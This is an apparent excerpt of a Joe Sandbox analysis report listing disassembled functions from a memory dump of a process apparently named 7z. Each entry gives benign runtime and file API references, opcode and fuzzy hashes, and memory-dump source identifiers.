                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputc
                                                                                                                                                                                                                                                                            • String ID: Kernel
                                                                                                                                                                                                                                                                            • API String ID: 1992160199-1736990243
                                                                                                                                                                                                                                                                            • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                                                            • Instruction ID: 8c8c179867e52410ce4c2d55cc06d0bc59284023272b8559f3768297317bb6e6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8C09B5575060882EF1417F7E8453251212D75DF91F185030CE1D47350D91DD4E68752
                                                                                                                                                                                                                                                                            Function 00693D58 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00693E2A
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                                                                                                                            • String ID: hh
                                                                                                                                                                                                                                                                            • API String ID: 2114622545-692164407
                                                                                                                                                                                                                                                                            • Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                                                                                            • Instruction ID: 2f6aba01295f9c5c82f556292bb2b9c3559e628dab98688c2da7a23ef858d28c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6031CE32201B5186DF159F25D5983A9B3AAFB85FE0F1841259F5A07B54DF38C95AC300
                                                                                                                                                                                                                                                                            Function 006AB1C8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                              • Part of subcall function 00662B04: _CxxThrowException.MSVCRT ref: 00662B2D
                                                                                                                                                                                                                                                                              • Part of subcall function 00662B04: free.MSVCRT ref: 00662B44
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3104931167-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                                                            • Instruction ID: 37f8d36b9dac42b3df64bf74acc5a239c1e2a79df37c6cce626ed88295941b4f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701C47770069096E705EF67EA9079E6722F75AB94F089022DF4807711DF74D8A6C710
                                                                                                                                                                                                                                                                            Function 00668A60 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,?,00000003,?,00668E1D), ref: 00668A99
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000003,?,00668E1D), ref: 00668AA6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                            • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                                                            • Instruction ID: 932678bd9c9bf9b8615f3d16c52d8b157743c8f9bf9e52a19bfbd380d9ffaccf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0F0FCB2B017C497DF309BB9D4447982363E759798F6C4122CE4843750DF2AC892CB10
                                                                                                                                                                                                                                                                            Function 006A0994 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputcfputsfree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2822829076-0
                                                                                                                                                                                                                                                                            • Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                                                                                                                            • Instruction ID: e4a7cef1058810b4a5ca7b9821058bc2fad3b5418b318445af9a55517c119604
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9F08263200A4480CB20EF21E86535E9321E78ABF8F484320EE6D577E9DF28C986CB04
                                                                                                                                                                                                                                                                            Function 00694035 Relevance: 2.6, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 0069404D
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 00694087
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: free.MSVCRT ref: 00663431
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: memmove.MSVCRT ref: 0066344C
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1415420288-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                                                                                            • Instruction ID: dc3eb4e0df3afb4599b9247d4db046c528fc2eb9ac353d4b7c850e5cb714dabf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F31A2672196C19ACE71EF14E5946EEB762F7A5340F404026C78D83F59EF38D65ACB00
                                                                                                                                                                                                                                                                            Function 00694054 Relevance: 2.6, APIs: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 00694065
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 00694087
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: free.MSVCRT ref: 00663431
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: memmove.MSVCRT ref: 0066344C
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1415420288-0
                                                                                                                                                                                                                                                                            • Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                                                                                            • Instruction ID: b727d9a41ddac502ac6b9117e4e48e98a85e87f043cfd448c162a43cfda2d19b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4511D2623156C592CE71FB10F4952EEA312F791390F80442ACB8E47F59DF38CA8ACB00
                                                                                                                                                                                                                                                                            Function 00689A34 Relevance: 2.5, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                                                            • Instruction ID: a3c1424b690d620b41c91f9c214f1590fed6d2412cb411c69ebad96c7783cd60
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65F0A463302B9187DA24AE26E8501AD6711EB86FB1F1C8324EF7917BD1CF24C857C314
                                                                                                                                                                                                                                                                            Function 006AC7D4 Relevance: 2.5, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 006AC815
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006AC81D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrowfreemallocmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1097815484-0
                                                                                                                                                                                                                                                                            • Opcode ID: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
                                                                                                                                                                                                                                                                            • Instruction ID: 8e7e4dcf574e786b06b45123450fab13da822c43b3126ad29b02b932279e4382
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C90181777015888BCB14EF26D46156CB765E789FA9B08C129DF054B358CA38DC86CB90
                                                                                                                                                                                                                                                                            Function 006A0A1C Relevance: 2.5, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 006A0A42
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 006A0A73
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB480: GetTickCount.KERNEL32 ref: 006AB49E
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB480: strcmp.MSVCRT ref: 006AB4E3
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB480: wcscmp.MSVCRT ref: 006AB502
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB480: strcmp.MSVCRT ref: 006AB568
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3267814326-0
                                                                                                                                                                                                                                                                            • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                                                            • Instruction ID: 08734c5f201f64433de936276aec7cb72cd3bb8f0e3faef161358043d5fd5975
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF05E62310A9082F710AB68E8847A96361E749BB5F144334DE7D476E5CF38899BC714
                                                                                                                                                                                                                                                                            Function 00662568 Relevance: 2.5, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                                                            • Instruction ID: afc026ec2ae61cb644e5674d546462ce30ff5f5c7769992f3d253a5ea9c5bdd7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBE0377225894151CB60EB20E46105AA761E7C67F4B442315F6BF577F9DE28C645CB04
                                                                                                                                                                                                                                                                            Function 00662130 Relevance: 2.5, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2436765578-0
                                                                                                                                                                                                                                                                            • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                                                            • Instruction ID: 8751ecc6dcb700a49eeeb8e8a1cc821fb041589bcf147052f16afcc03b20dba9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2D022A0B1B6C4D0DF04B79098813146722A39A340F801046E24E41324DA1DC0AF8B02
                                                                                                                                                                                                                                                                            Function 0067251C Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                                                            • Instruction ID: b4ae5dad3c5213b472c0a087b6b8979c5fcfaa21d717b505461771b3d05fba35
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E514A72244AC296DB62CF35D4602ED3B62F389F98F698136DE9E0A719DF34C885C710
                                                                                                                                                                                                                                                                            Function 006886E0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteString
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4236320881-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                                                            • Instruction ID: 49cde9ca3a134880a4e1714b98534e6e86210f0a73b334326a5fbe04c0184324
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1611C82621878186E360AB58E4407AE6371E7847E4FA44320EFDA577E4EF3CCD86CB05
                                                                                                                                                                                                                                                                            Function 00668C98 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
